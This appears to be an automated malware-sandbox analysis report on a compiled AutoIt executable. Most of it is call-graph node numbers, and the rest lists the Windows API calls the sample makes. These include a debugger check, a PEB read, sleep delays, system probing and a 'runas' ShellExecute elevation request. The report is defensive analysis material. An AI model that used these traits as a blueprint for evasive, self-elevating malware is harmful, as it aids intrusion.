409253 PeekMessageW 86783->86831 87991 401a50 331 API calls 86784->87991 86785 40d410 VariantClear 86785->86831 86787 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86787->86780 86789 4095f9 86787->86789 86788 42d8cd Sleep 86788->86831 86793 42e158 TranslateMessage DispatchMessageW GetMessageW 86789->86793 86791 42e13b 88010 40d410 VariantClear 86791->88010 86793->86793 86795 42e188 86793->86795 86795->86780 86797 409567 PeekMessageW 86797->86831 86799 44c29d 52 API calls 86839 4094e0 86799->86839 86800 46f3c1 107 API calls 86800->86831 86801 40e0a0 52 API calls 86801->86831 86802 46fdbf 108 API calls 86802->86839 86803 409551 TranslateMessage DispatchMessageW 86803->86797 86805 42dcd2 WaitForSingleObject 86806 42dcf0 GetExitCodeProcess CloseHandle 86805->86806 86805->86831 87999 40d410 VariantClear 86806->87999 86808 42dd3d Sleep 86808->86839 86811 4094cf Sleep 86811->86839 86813 42d94d timeGetTime 87995 465124 53 API calls 86813->87995 86815 40c620 timeGetTime 86815->86839 86818 42dd89 CloseHandle 86818->86839 86819 47d33e 309 API calls 86819->86831 86821 408f40 VariantClear 86821->86839 86822 465124 53 API calls 86822->86839 86823 42de19 GetExitCodeProcess CloseHandle 86823->86839 86826 42de88 Sleep 86826->86831 86831->86779 86831->86783 86831->86785 86831->86788 86831->86791 86831->86797 86831->86800 86831->86801 86831->86803 86831->86805 86831->86808 86831->86811 86831->86813 86831->86819 86832 42e0cc VariantClear 86831->86832 86833 45e737 90 API calls 86831->86833 86834 408f40 VariantClear 86831->86834 86831->86839 87727 4091b0 86831->87727 87785 40afa0 86831->87785 87811 408fc0 86831->87811 87846 408cc0 86831->87846 87860 4096a0 86831->87860 87987 40d150 TranslateAcceleratorW 86831->87987 87988 40d170 IsDialogMessageW GetClassLongW 86831->87988 87993 465124 53 API calls 86831->87993 87994 40c620 timeGetTime 86831->87994 88009 40e270 VariantClear ctype 86831->88009 86832->86831 86833->86831 86834->86831 86836 401980 53 API calls 86836->86839 86837 401b10 
52 API calls 86837->86839 86839->86799 86839->86802 86839->86815 86839->86818 86839->86821 86839->86822 86839->86823 86839->86826 86839->86831 86839->86836 86839->86837 87996 45178a 54 API calls 86839->87996 87997 47d33e 331 API calls 86839->87997 87998 453bc6 54 API calls 86839->87998 88000 40d410 VariantClear 86839->88000 88001 443d19 67 API calls _wcslen 86839->88001 88002 4574b4 VariantClear 86839->88002 88003 403cd0 86839->88003 88007 4731e1 VariantClear 86839->88007 88008 4331a2 6 API calls 86839->88008 86840->86608 86841->86593 86842->86599 86844 401b16 _wcslen 86843->86844 86845 4115d7 52 API calls 86844->86845 86848 401b63 86844->86848 86846 401b4b _memmove 86845->86846 86847 4115d7 52 API calls 86846->86847 86847->86848 86849 40d200 52 API calls 2 library calls 86848->86849 86849->86615 86850->86618 86852 40bc70 52 API calls 86851->86852 86853 401f31 86852->86853 86854 402560 86853->86854 86855 40256d __write_nolock 86854->86855 86856 402160 52 API calls 86855->86856 86858 402593 86856->86858 86865 4025bd 86858->86865 86929 401c90 86858->86929 86859 4026f0 52 API calls 86859->86865 86860 4026a7 86861 401b10 52 API calls 86860->86861 86868 4026db 86860->86868 86863 4026d1 86861->86863 86862 401b10 52 API calls 86862->86865 86933 40d7c0 52 API calls 2 library calls 86863->86933 86864 401c90 52 API calls 86864->86865 86865->86859 86865->86860 86865->86862 86865->86864 86932 40d7c0 52 API calls 2 library calls 86865->86932 86868->86673 86934 40f760 86869->86934 86872 410118 86872->86675 86874 42805d 86875 42806a 86874->86875 86990 431e58 86874->86990 86877 413748 _free 46 API calls 86875->86877 86878 428078 86877->86878 86879 431e58 82 API calls 86878->86879 86880 428084 86879->86880 86880->86675 86882 4115d7 52 API calls 86881->86882 86883 401f74 86882->86883 86883->86678 86885 4019a3 86884->86885 86890 401985 86884->86890 86886 4019b8 86885->86886 86885->86890 87596 403e10 53 API calls 86886->87596 86888 40199f 86888->86681 86889 4019c4 86889->86681 
86890->86888 87595 403e10 53 API calls 86890->87595 86893 40c2c7 86892->86893 86894 40c30e 86892->86894 86897 40c2d3 86893->86897 86898 426c79 86893->86898 86895 40c315 86894->86895 86896 426c2b 86894->86896 86899 40c321 86895->86899 86900 426c5a 86895->86900 86902 426c4b 86896->86902 86903 426c2e 86896->86903 87597 403ea0 52 API calls __cinit 86897->87597 87602 4534e3 52 API calls 86898->87602 87598 403ea0 52 API calls __cinit 86899->87598 87601 4534e3 52 API calls 86900->87601 87600 4534e3 52 API calls 86902->87600 86906 40c2de 86903->86906 87599 4534e3 52 API calls 86903->87599 86906->86691 86911 401a30 86910->86911 86912 401a17 86910->86912 86914 402160 52 API calls 86911->86914 86913 401a2d 86912->86913 87603 403c30 52 API calls _memmove 86912->87603 86913->86695 86915 401a3d 86914->86915 86915->86695 86918 411523 86917->86918 86919 4114ba 86917->86919 87606 4113a8 58 API calls 3 library calls 86918->87606 86922 40200c 86919->86922 87604 417f77 46 API calls __getptd_noexit 86919->87604 86922->86698 86922->86699 86923 4114c6 87605 417f25 10 API calls _xtow_s@20 86923->87605 86925->86727 86926->86729 86927->86734 86928->86734 86930 4026f0 52 API calls 86929->86930 86931 401c97 86930->86931 86931->86858 86932->86865 86933->86868 86994 40f6f0 86934->86994 86936 40f77b _strcat ctype 87002 40f850 86936->87002 86941 427c2a 87031 414d04 86941->87031 86943 40f7fc 86943->86941 86945 40f804 86943->86945 87018 414a46 86945->87018 86949 40f80e 86949->86872 86953 4528bd 86949->86953 86950 427c59 87037 414fe2 86950->87037 86952 427c79 86954 4150d1 _fseek 81 API calls 86953->86954 86955 452930 86954->86955 87537 452719 86955->87537 86958 452948 86958->86874 86959 414d04 __fread_nolock 61 API calls 86960 452966 86959->86960 86961 414d04 __fread_nolock 61 API calls 86960->86961 86962 452976 86961->86962 86963 414d04 __fread_nolock 61 API calls 86962->86963 86964 45298f 86963->86964 86965 414d04 __fread_nolock 61 API calls 86964->86965 86966 4529aa 86965->86966 86967 4150d1 
_fseek 81 API calls 86966->86967 86968 4529c4 86967->86968 86969 4135bb _malloc 46 API calls 86968->86969 86970 4529cf 86969->86970 86971 4135bb _malloc 46 API calls 86970->86971 86972 4529db 86971->86972 86973 414d04 __fread_nolock 61 API calls 86972->86973 86974 4529ec 86973->86974 86975 44afef GetSystemTimeAsFileTime 86974->86975 86976 452a00 86975->86976 86977 452a36 86976->86977 86978 452a13 86976->86978 86980 452aa5 86977->86980 86981 452a3c 86977->86981 86979 413748 _free 46 API calls 86978->86979 86984 452a1c 86979->86984 86983 413748 _free 46 API calls 86980->86983 87543 44b1a9 86981->87543 86986 452aa3 86983->86986 86987 413748 _free 46 API calls 86984->86987 86985 452a9d 86988 413748 _free 46 API calls 86985->86988 86986->86874 86989 452a25 86987->86989 86988->86986 86989->86874 86991 431e64 86990->86991 86992 431e6a 86990->86992 86993 414a46 __fcloseall 82 API calls 86991->86993 86992->86875 86993->86992 86995 425de2 86994->86995 86996 40f6fc _wcslen 86994->86996 86995->86936 86997 40f710 WideCharToMultiByte 86996->86997 86998 40f756 86997->86998 86999 40f728 86997->86999 86998->86936 87000 4115d7 52 API calls 86999->87000 87001 40f735 WideCharToMultiByte 87000->87001 87001->86936 87004 40f85d __crtGetStringTypeA_stat _strlen 87002->87004 87005 40f7ab 87004->87005 87050 414db8 87004->87050 87006 4149c2 87005->87006 87065 414904 87006->87065 87008 40f7e9 87008->86941 87009 40f5c0 87008->87009 87013 40f5cd _strcat __write_nolock _memmove 87009->87013 87010 414d04 __fread_nolock 61 API calls 87010->87013 87011 40f691 __tzset_nolock 87011->86943 87013->87010 87013->87011 87014 425d11 87013->87014 87153 4150d1 87013->87153 87015 4150d1 _fseek 81 API calls 87014->87015 87016 425d33 87015->87016 87017 414d04 __fread_nolock 61 API calls 87016->87017 87017->87011 87019 414a52 _doexit 87018->87019 87020 414a64 87019->87020 87021 414a79 87019->87021 87293 417f77 46 API calls __getptd_noexit 87020->87293 87023 415471 __lock_file 47 API calls 87021->87023 87027 
414a74 _doexit 87021->87027 87025 414a92 87023->87025 87024 414a69 87294 417f25 10 API calls _xtow_s@20 87024->87294 87277 4149d9 87025->87277 87027->86949 87362 414c76 87031->87362 87033 414d1c 87034 44afef 87033->87034 87530 442c5a 87034->87530 87036 44b00d 87036->86950 87038 414fee _doexit 87037->87038 87039 414ffa 87038->87039 87040 41500f 87038->87040 87534 417f77 46 API calls __getptd_noexit 87039->87534 87042 415471 __lock_file 47 API calls 87040->87042 87044 415017 87042->87044 87043 414fff 87535 417f25 10 API calls _xtow_s@20 87043->87535 87046 414e4e __ftell_nolock 51 API calls 87044->87046 87048 415024 87046->87048 87047 41500a _doexit 87047->86952 87536 41503d LeaveCriticalSection LeaveCriticalSection _fprintf 87048->87536 87051 414dd6 87050->87051 87052 414deb 87050->87052 87061 417f77 46 API calls __getptd_noexit 87051->87061 87052->87051 87054 414df2 87052->87054 87063 41b91b 79 API calls 12 library calls 87054->87063 87055 414ddb 87062 417f25 10 API calls _xtow_s@20 87055->87062 87058 414e18 87059 414de6 87058->87059 87064 418f98 77 API calls 7 library calls 87058->87064 87059->87004 87061->87055 87062->87059 87063->87058 87064->87059 87068 414910 _doexit 87065->87068 87066 414923 87121 417f77 46 API calls __getptd_noexit 87066->87121 87068->87066 87070 414951 87068->87070 87069 414928 87122 417f25 10 API calls _xtow_s@20 87069->87122 87084 41d4d1 87070->87084 87073 414956 87074 41496a 87073->87074 87075 41495d 87073->87075 87077 414992 87074->87077 87078 414972 87074->87078 87123 417f77 46 API calls __getptd_noexit 87075->87123 87101 41d218 87077->87101 87124 417f77 46 API calls __getptd_noexit 87078->87124 87079 414933 _doexit @_EH4_CallFilterFunc@8 87079->87008 87085 41d4dd _doexit 87084->87085 87086 4182cb __lock 46 API calls 87085->87086 87099 41d4eb 87086->87099 87087 41d560 87126 41d5fb 87087->87126 87088 41d567 87089 416b04 __malloc_crt 46 API calls 87088->87089 87092 41d56e 87089->87092 87091 41d5f0 _doexit 87091->87073 87092->87087 87093 
41d57c InitializeCriticalSectionAndSpinCount 87092->87093 87094 41d59c 87093->87094 87095 41d5af EnterCriticalSection 87093->87095 87098 413748 _free 46 API calls 87094->87098 87095->87087 87096 418209 __mtinitlocknum 46 API calls 87096->87099 87098->87087 87099->87087 87099->87088 87099->87096 87129 4154b2 47 API calls __lock 87099->87129 87130 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87099->87130 87102 41d23a 87101->87102 87103 41d255 87102->87103 87115 41d26c __wopenfile 87102->87115 87135 417f77 46 API calls __getptd_noexit 87103->87135 87105 41d25a 87136 417f25 10 API calls _xtow_s@20 87105->87136 87106 41d421 87107 41d47a 87106->87107 87108 41d48c 87106->87108 87140 417f77 46 API calls __getptd_noexit 87107->87140 87132 422bf9 87108->87132 87112 41d47f 87141 417f25 10 API calls _xtow_s@20 87112->87141 87113 41499d 87125 4149b8 LeaveCriticalSection LeaveCriticalSection _fprintf 87113->87125 87115->87106 87115->87107 87137 41341f 58 API calls 2 library calls 87115->87137 87117 41d41a 87117->87106 87138 41341f 58 API calls 2 library calls 87117->87138 87119 41d439 87119->87106 87139 41341f 58 API calls 2 library calls 87119->87139 87121->87069 87122->87079 87123->87079 87124->87079 87125->87079 87131 4181f2 LeaveCriticalSection 87126->87131 87128 41d602 87128->87091 87129->87099 87130->87099 87131->87128 87142 422b35 87132->87142 87134 422c14 87134->87113 87135->87105 87136->87113 87137->87117 87138->87119 87139->87106 87140->87112 87141->87113 87143 422b41 _doexit 87142->87143 87144 422b54 87143->87144 87147 422b8a 87143->87147 87145 417f77 _xtow_s@20 46 API calls 87144->87145 87146 422b59 87145->87146 87148 417f25 _xtow_s@20 10 API calls 87146->87148 87149 422400 __tsopen_nolock 109 API calls 87147->87149 87152 422b63 _doexit 87148->87152 87150 422ba4 87149->87150 87151 422bcb __wsopen_helper LeaveCriticalSection 87150->87151 87151->87152 87152->87134 87156 4150dd _doexit 87153->87156 87154 4150e9 87184 417f77 46 API calls __getptd_noexit 
87154->87184 87156->87154 87157 41510f 87156->87157 87166 415471 87157->87166 87158 4150ee 87185 417f25 10 API calls _xtow_s@20 87158->87185 87165 4150f9 _doexit 87165->87013 87167 415483 87166->87167 87168 4154a5 EnterCriticalSection 87166->87168 87167->87168 87169 41548b 87167->87169 87171 415117 87168->87171 87170 4182cb __lock 46 API calls 87169->87170 87170->87171 87172 415047 87171->87172 87173 415067 87172->87173 87174 415057 87172->87174 87179 415079 87173->87179 87187 414e4e 87173->87187 87242 417f77 46 API calls __getptd_noexit 87174->87242 87178 41505c 87186 415143 LeaveCriticalSection LeaveCriticalSection _fprintf 87178->87186 87204 41443c 87179->87204 87182 4150b9 87217 41e1f4 87182->87217 87184->87158 87185->87165 87186->87165 87188 414e61 87187->87188 87189 414e79 87187->87189 87243 417f77 46 API calls __getptd_noexit 87188->87243 87191 414139 __fclose_nolock 46 API calls 87189->87191 87193 414e80 87191->87193 87192 414e66 87244 417f25 10 API calls _xtow_s@20 87192->87244 87195 41e1f4 __write 51 API calls 87193->87195 87196 414e97 87195->87196 87197 414f09 87196->87197 87199 414ec9 87196->87199 87203 414e71 87196->87203 87245 417f77 46 API calls __getptd_noexit 87197->87245 87200 41e1f4 __write 51 API calls 87199->87200 87199->87203 87201 414f64 87200->87201 87202 41e1f4 __write 51 API calls 87201->87202 87201->87203 87202->87203 87203->87179 87205 414455 87204->87205 87209 414477 87204->87209 87206 414139 __fclose_nolock 46 API calls 87205->87206 87205->87209 87207 414470 87206->87207 87246 41b7b2 77 API calls 6 library calls 87207->87246 87210 414139 87209->87210 87211 414145 87210->87211 87212 41415a 87210->87212 87247 417f77 46 API calls __getptd_noexit 87211->87247 87212->87182 87214 41414a 87248 417f25 10 API calls _xtow_s@20 87214->87248 87216 414155 87216->87182 87218 41e200 _doexit 87217->87218 87219 41e223 87218->87219 87220 41e208 87218->87220 87221 41e22f 87219->87221 87226 41e269 87219->87226 87269 417f8a 46 API calls __getptd_noexit 
87220->87269 87271 417f8a 46 API calls __getptd_noexit 87221->87271 87224 41e20d 87270 417f77 46 API calls __getptd_noexit 87224->87270 87225 41e234 87272 417f77 46 API calls __getptd_noexit 87225->87272 87249 41ae56 87226->87249 87230 41e23c 87273 417f25 10 API calls _xtow_s@20 87230->87273 87231 41e26f 87233 41e291 87231->87233 87234 41e27d 87231->87234 87274 417f77 46 API calls __getptd_noexit 87233->87274 87259 41e17f 87234->87259 87236 41e215 _doexit 87236->87178 87238 41e289 87276 41e2c0 LeaveCriticalSection __unlock_fhandle 87238->87276 87239 41e296 87275 417f8a 46 API calls __getptd_noexit 87239->87275 87242->87178 87243->87192 87244->87203 87245->87203 87246->87209 87247->87214 87248->87216 87250 41ae62 _doexit 87249->87250 87251 41aebc 87250->87251 87252 4182cb __lock 46 API calls 87250->87252 87253 41aec1 EnterCriticalSection 87251->87253 87254 41aede _doexit 87251->87254 87255 41ae8e 87252->87255 87253->87254 87254->87231 87256 41aeaa 87255->87256 87257 41ae97 InitializeCriticalSectionAndSpinCount 87255->87257 87258 41aeec ___lock_fhandle LeaveCriticalSection 87256->87258 87257->87256 87258->87251 87260 41aded __commit 46 API calls 87259->87260 87261 41e18e 87260->87261 87262 41e1a4 SetFilePointer 87261->87262 87263 41e194 87261->87263 87264 41e1bb GetLastError 87262->87264 87266 41e1c3 87262->87266 87265 417f77 _xtow_s@20 46 API calls 87263->87265 87264->87266 87267 41e199 87265->87267 87266->87267 87268 417f9d __dosmaperr 46 API calls 87266->87268 87267->87238 87268->87267 87269->87224 87270->87236 87271->87225 87272->87230 87273->87236 87274->87239 87275->87238 87276->87236 87278 4149ea 87277->87278 87279 4149fe 87277->87279 87323 417f77 46 API calls __getptd_noexit 87278->87323 87282 41443c __flush 77 API calls 87279->87282 87285 4149fa 87279->87285 87281 4149ef 87324 417f25 10 API calls _xtow_s@20 87281->87324 87284 414a0a 87282->87284 87296 41d8c2 87284->87296 87295 414ab2 LeaveCriticalSection LeaveCriticalSection _fprintf 87285->87295 87288 
414139 __fclose_nolock 46 API calls 87289 414a18 87288->87289 87300 41d7fe 87289->87300 87291 414a1e 87291->87285 87292 413748 _free 46 API calls 87291->87292 87292->87285 87293->87024 87294->87027 87295->87027 87297 414a12 87296->87297 87298 41d8d2 87296->87298 87297->87288 87298->87297 87299 413748 _free 46 API calls 87298->87299 87299->87297 87301 41d80a _doexit 87300->87301 87302 41d812 87301->87302 87303 41d82d 87301->87303 87340 417f8a 46 API calls __getptd_noexit 87302->87340 87304 41d839 87303->87304 87309 41d873 87303->87309 87342 417f8a 46 API calls __getptd_noexit 87304->87342 87307 41d817 87341 417f77 46 API calls __getptd_noexit 87307->87341 87308 41d83e 87343 417f77 46 API calls __getptd_noexit 87308->87343 87312 41ae56 ___lock_fhandle 48 API calls 87309->87312 87315 41d879 87312->87315 87313 41d81f _doexit 87313->87291 87314 41d846 87344 417f25 10 API calls _xtow_s@20 87314->87344 87317 41d893 87315->87317 87318 41d887 87315->87318 87345 417f77 46 API calls __getptd_noexit 87317->87345 87325 41d762 87318->87325 87321 41d88d 87346 41d8ba LeaveCriticalSection __unlock_fhandle 87321->87346 87323->87281 87324->87285 87347 41aded 87325->87347 87327 41d7c8 87360 41ad67 47 API calls 2 library calls 87327->87360 87328 41d772 87328->87327 87330 41d7a6 87328->87330 87332 41aded __commit 46 API calls 87328->87332 87330->87327 87333 41aded __commit 46 API calls 87330->87333 87331 41d7d0 87334 41d7f2 87331->87334 87361 417f9d 46 API calls 3 library calls 87331->87361 87335 41d79d 87332->87335 87336 41d7b2 CloseHandle 87333->87336 87334->87321 87338 41aded __commit 46 API calls 87335->87338 87336->87327 87339 41d7be GetLastError 87336->87339 87338->87330 87339->87327 87340->87307 87341->87313 87342->87308 87343->87314 87344->87313 87345->87321 87346->87313 87348 41ae12 87347->87348 87349 41adfa 87347->87349 87351 417f8a __commit 46 API calls 87348->87351 87355 41ae51 87348->87355 87350 417f8a __commit 46 API calls 87349->87350 87352 41adff 87350->87352 87354 
41ae23 87351->87354 87353 417f77 _xtow_s@20 46 API calls 87352->87353 87356 41ae07 87353->87356 87357 417f77 _xtow_s@20 46 API calls 87354->87357 87355->87328 87356->87328 87358 41ae2b 87357->87358 87359 417f25 _xtow_s@20 10 API calls 87358->87359 87359->87356 87360->87331 87361->87334 87363 414c82 _doexit 87362->87363 87364 414cc3 87363->87364 87365 414c96 __crtGetStringTypeA_stat 87363->87365 87366 414cbb _doexit 87363->87366 87367 415471 __lock_file 47 API calls 87364->87367 87389 417f77 46 API calls __getptd_noexit 87365->87389 87366->87033 87368 414ccb 87367->87368 87375 414aba 87368->87375 87371 414cb0 87390 417f25 10 API calls _xtow_s@20 87371->87390 87378 414ad8 __crtGetStringTypeA_stat 87375->87378 87382 414af2 87375->87382 87376 414ae2 87442 417f77 46 API calls __getptd_noexit 87376->87442 87378->87376 87378->87382 87386 414b2d 87378->87386 87379 414ae7 87443 417f25 10 API calls _xtow_s@20 87379->87443 87391 414cfa LeaveCriticalSection LeaveCriticalSection _fprintf 87382->87391 87383 414c38 __crtGetStringTypeA_stat 87445 417f77 46 API calls __getptd_noexit 87383->87445 87384 414139 __fclose_nolock 46 API calls 87384->87386 87386->87382 87386->87383 87386->87384 87392 41dfcc 87386->87392 87422 41d8f3 87386->87422 87444 41e0c2 46 API calls 3 library calls 87386->87444 87389->87371 87390->87366 87391->87366 87393 41dfd8 _doexit 87392->87393 87394 41dfe0 87393->87394 87395 41dffb 87393->87395 87515 417f8a 46 API calls __getptd_noexit 87394->87515 87397 41e007 87395->87397 87400 41e041 87395->87400 87517 417f8a 46 API calls __getptd_noexit 87397->87517 87398 41dfe5 87516 417f77 46 API calls __getptd_noexit 87398->87516 87403 41e063 87400->87403 87404 41e04e 87400->87404 87402 41e00c 87518 417f77 46 API calls __getptd_noexit 87402->87518 87407 41ae56 ___lock_fhandle 48 API calls 87403->87407 87520 417f8a 46 API calls __getptd_noexit 87404->87520 87410 41e069 87407->87410 87408 41e014 87519 417f25 10 API calls _xtow_s@20 87408->87519 87409 41e053 87521 417f77 46 
[Control-flow graph residue: the interactive call-graph export in this part of the report consisted only of node and edge identifiers and has been condensed. Recoverable information: CRT file-I/O helpers (__getptd_noexit, __read, __fclose_nolock, __lseeki64_nolock, __commit, __malloc_crt, _malloc, _free, __dosmaperr) that call ReadFile, GetLastError and MultiByteToWideChar; path and file handling via GetFullPathNameW, SHGetDesktopFolder, SHGetPathFromIDListW, CreateFileW, SetFilePointerEx, WriteFile, GetFileAttributesW, FindFirstFileW, FindClose and CloseHandle; COM variant handling (VariantInit, VariantCopy, VariantClear); synchronisation via InterlockedIncrement, InterlockedDecrement and Sleep; a routine at 0x4207018 labelled GetPEB followed by a Sleep call at 0x42092C1; environment probing via GetVersionExW, GetCurrentProcess, GetSystemInfo and GetNativeSystemInfo, the latter resolved at run time with LoadLibraryA/GetProcAddress and released with FreeLibrary; GetSystemTimeAsFileTime; GetStdHandle; CreateThread followed by CloseHandle; CharUpperBuffW; and a registry read via RegOpenKeyExW, RegQueryValueExW and RegCloseKey. The API list that follows belongs to the function beginning at 0x4096A0 (the graph node whose first call is _wcslen at 0x4096C1).]
APIs
• _wcslen.LIBCMT ref: 004096C1
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• _memmove.LIBCMT ref: 0040970C
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
• _memmove.LIBCMT ref: 00409D96
• _memmove.LIBCMT ref: 0040A6C4
• _memmove.LIBCMT ref: 004297E5
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
• String ID:
• API String ID: 2383988440-0
• Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
• Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
• Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
• Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
• IsDebuggerPresent.KERNEL32 ref: 0040D5B6
• GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
• SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
• SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
• GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
• ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
  • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
  • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
Strings
• runas, xrefs: 0042E2AD, 0042E2DC
• This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
• String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
• API String ID: 2495805114-3383388033
• Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
• Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
• Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
• Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

Control-flow Graph

APIs
• GetVersionExW.KERNEL32(?), ref: 0040E52A
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
• GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
• FreeLibrary.KERNEL32(?), ref: 0040E642
• FreeLibrary.KERNEL32(?), ref: 0040E654
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
• String ID: 0SH
• API String ID: 3363477735-851180471
• Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
• Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
• Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
• Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
APIs
• LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
